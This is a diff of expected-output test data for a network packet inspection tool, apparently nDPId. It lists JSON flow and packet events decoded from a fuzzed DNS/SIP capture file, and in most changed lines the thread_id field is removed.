00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":645,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120471001714,"flow_last_seen":1120471010718,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471010718,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -1264,8 +1264,8 @@
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471018720,"flow_last_seen":1120471018720,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471018720,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2824,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471018720,"flow_last_seen":1120471018720,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471018720,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2824,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":2,"flow_last_seen":1120471018721,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120471018721,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CwgAR8InDQuAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAgQAAJxAACwlsb2NhbGhvc3QA"} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":2,"flow_last_seen":1120471018721,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120471018721,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CwgAR8InDQuAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAgQAAJxAACwlsb2NhbGhvc3QA"}
00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":647,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471018720,"flow_last_seen":1120471018721,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471018721,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2824,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":647,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471018720,"flow_last_seen":1120471018721,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471018721,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2824,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
00755{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":649,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":342,"pkt_l4_len":0,"thread_ts_msec":1120471018723,"pkt":"AODtAW69ADBUADRWCABFAAFIAABACDcRiuXU8iEjwKgBAhPEE8QBNCHFU0lQLzIuMCAxMDAgVHJ5aW5nDQpDYWxsLUlEOiAyOTg1ODE0qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00741{"packet_event_id":1,"packet_event_name":"packet","packet_id":649,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":342,"pkt_l4_len":0,"thread_ts_msec":1120471018723,"pkt":"AODtAW69ADBUADRWCABFAAFIAABACDcRiuXU8iEjwKgBAhPEE8QBNCHFU0lQLzIuMCAxMDAgVHJ5aW5nDQpDYWxsLUlEOiAyOTg1ODE0qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00231{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":649,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":308,"global_ts_msec":1120471018870} 00217{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":649,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":308,"global_ts_msec":1120471018870}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":652,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471019307,"flow_last_seen":1120471019307,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471019307,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":652,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471019307,"flow_last_seen":1120471019307,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471019307,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":652,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1120471019307,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471019307,"pkt":"ADBUADRWAODtAW69CABFAABIbEwAAIARSwXAqAECwKgBAQsJADUANMyuXQ0BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":652,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1120471019307,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471019307,"pkt":"ADBUADRWAODtAW69CABFAABIbEwAAIARSwXAqAECwKgBAQsJADUANMyuXQ0BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471019307,"flow_last_seen":1120471019307,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471019307,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471019307,"flow_last_seen":1120471019307,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471019307,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -1292,13 +1292,13 @@
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":666,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471049334,"flow_last_seen":1120471049334,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471049334,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":666,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471049334,"flow_last_seen":1120471049334,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471049334,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1120471049334,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471049334,"pkt":"ADBUADRWAODtAW69CABFAABIbFcAAIARSvrAqAECwKgBAQsLADUANESJ5TABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaU15Alb4AAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1120471049334,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471049334,"pkt":"ADBUADRWAODtAW69CABFAABIbFcAAIARSvrAqAECwKgBAQsLADUANESJ5TABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaU15Alb4AAAhAAE="}
00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":666,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471049334,"flow_last_seen":1120471049334,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471049334,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercimy.v?","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":666,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471049334,"flow_last_seen":1120471049334,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471049334,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercimy.v?","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00414{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":667,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":18432,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120471049334,"pkt":"ADBUADRWAODtAW69SABFAABIbFgAAIARQvnAqAECwKgBAQsLADUANESJ5TABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":667,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":18432,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120471049334,"pkt":"ADBUADRWAODtAW69SABFAABIbFgAAIARQvnAqAECwKgBAQsLADUANESJ5TABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":667,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":18432,"global_ts_msec":1120471051336} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":667,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":18432,"global_ts_msec":1120471051336}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471053339,"flow_last_seen":1120471053339,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471053339,"flow_last_seen":1120471053339,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1120471053339,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471053339,"pkt":"ADBUADRWAODtAW69CABFAABIbFkAAIARSvjAqAECwKoBAQsLADUANESJ5TABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJj8XR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1120471053339,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471053339,"pkt":"ADBUADRWAODtAW69CABFAABIbFkAAIARSvjAqAECwKoBAQsLADUANESJ5TABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJj8XR5AmRrAAAhAAE="}
00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":668,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471053339,"flow_last_seen":1120471053339,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberc?ty.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":668,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471053339,"flow_last_seen":1120471053339,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberc?ty.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00413{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":669,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120471053339,"pkt":"ADBcADRHAODtAW69CABgAABIbFoAAIARSvfAqAECwKgBAQsLADUANESJ5TABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liRXdjaXR5AmRrAAAhgAE="} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":669,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120471053339,"pkt":"ADBcADRHAODtAW69CABgAABIbFoAAIARSvfAqAECwKgBAQsLADUANESJ5TABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liRXdjaXR5AmRrAAAhgAE="}
00210{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":669,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120471057345} 00196{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"packet_id":669,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120471057345}
00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470442140,"flow_last_seen":1120470442140,"flow_idle_time":600000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":19,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470442140,"flow_last_seen":1120470442140,"flow_idle_time":600000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":19,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470442140,"flow_last_seen":1120470442140,"flow_idle_time":600000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":19,"flow_datalink":1,"flow_max_packets":3} 00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470442140,"flow_last_seen":1120470442140,"flow_idle_time":600000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":19,"flow_datalink":1,"flow_max_packets":3}
00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865650,"flow_last_seen":1120470865650,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2805,"dst_port":51,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865650,"flow_last_seen":1120470865650,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2805,"dst_port":51,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
@@ -1325,8 +1325,8 @@
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1120471077370,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471077370,"pkt":"ADBUADRWAODtAW69CABFAABIbGAAAIARSvHAqAECwKgBAQsNADUANFmE0DMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1120471077370,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471077370,"pkt":"ADBUADRWAODtAW69CABFAABIbGAAAIARSvHAqAECwKgBAQsNADUANFmE0DMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
